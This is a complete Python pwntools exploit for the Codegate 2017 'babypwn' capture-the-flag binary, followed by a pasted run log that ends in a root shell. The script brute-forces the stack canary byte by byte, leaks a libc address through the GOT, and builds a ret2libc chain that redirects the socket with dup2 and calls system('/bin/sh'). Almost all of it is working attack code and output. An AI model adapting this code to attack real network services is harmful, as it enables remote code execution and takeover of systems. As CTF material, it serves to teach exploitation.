from pwn import *
import sys

HOST = '127.0.0.1'
PORT = 8181

context(os = "linux", arch = "i386")
#context.log_level = 'DEBUG'

elf = ELF("./babypwn")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")

def screen_clean():

	sys.stdout.write("\033[F")
       sys.stdout.write("\033[K")

def canary_bruteforce(offset):

	junk = "A" * offset
	canary_value = ""

	while len(canary_value) < 4:

		word = 0x00

		while word < 0xff:

			try:
				r = remote(HOST, PORT)
				screen_clean()

				payload = ""
				payload += junk
				payload += canary_value
				payload += chr(word)

            			r.sendlineafter("> ", "2")
            			r.sendafter("Message : ", payload)
            			r.sendlineafter("> ", "3")

				r.recv()

				log.success("Byte found: " + hex(word))
				canary_value += chr(word)
				r.close()
				screen_clean()
				break

			except EOFError as error:
				word += 1
				r.close()
				screen_clean()

	return u32(canary_value)

log.info("Deploying stage 1: Canary bruteforce")

canary_offset = 40
canary_value = canary_bruteforce(canary_offset)

log.success("Canary value: " + hex(canary_value))

log.info("Deploying stage 2: Leak base libc address")

leak = flat (
	"A" * canary_offset,
	canary_value,
	"B" * 0xc,
	elf.sym['send'],
	"AAAA",
	0x4,
	elf.got['fork'],
	0x4,
	0x0,
	endianness = 'little', word_size = 32, sign = False)

r = remote(HOST, PORT)
screen_clean()

r.sendlineafter("> ", "2")
r.sendafter("Message : ", leak)
r.sendlineafter("> ", "3")

fork_leak = u32(r.recv(4))

log.success("Leaked fork@@GLIBC address: " + hex(fork_leak))

r.close()
screen_clean()

libc.address = fork_leak - libc.sym['fork']

log.success("Base libc address: " + hex(libc.address))
log.success("Dup2@@GLIBC address: " + hex(libc.sym['dup2']))
log.success("System@@GLIBC address: " + hex(libc.sym['system']))
log.success("/bin/sh address: " + hex(libc.search('/bin/sh').next()))

log.info("Deploying stage 3: Shell spawn")

shell = flat (
	"A" * canary_offset,
        canary_value,
        "B" * 0xc,
	libc.sym['dup2'],
	0x08048b84,		# pop edi ; pop ebp ; ret (Cleaning the stack)
	0x4,
	0x0,
	libc.sym['dup2'],
	0x08048b84,		# pop edi ; pop ebp ; ret (Cleaning the stack)
	0x4,
	0x1,
	libc.sym['system'],
	libc.sym['exit'],
	libc.search('/bin/sh').next(),
	endianness = 'little', word_size = 32, sign = False)

r = remote(HOST, PORT)
screen_clean()

r.sendlineafter("> ", "2")
r.sendafter("Message : ", shell)
r.sendlineafter("> ", "3")

r.interactive()

r.close()
screen_clean()

'''
kaorz@kali:~/Exp/babypwn_codegate_2017# python exploit.py 
[*] '/root/Desktop/Exp/Exp/babypwn_codegate_2017/babypwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] '/lib/i386-linux-gnu/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Deploying stage 1: Canary bruteforce
[+] Byte found: 0x0
[+] Byte found: 0xd0
[+] Byte found: 0xc9
[+] Byte found: 0xb0
[+] Canary value: 0xb0c9d000
[*] Deploying stage 2: Leak base libc address
[+] Leaked fork@@GLIBC address: 0xf7dcb190
[+] Base libc address: 0xf7d0d000
[+] Dup2@@GLIBC address: 0xf7df32a0
[+] System@@GLIBC address: 0xf7d49d10
[+] /bin/sh address: 0xf7e88988
[*] Deploying stage 3: Shell spawn
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) grupos=0(root)
'''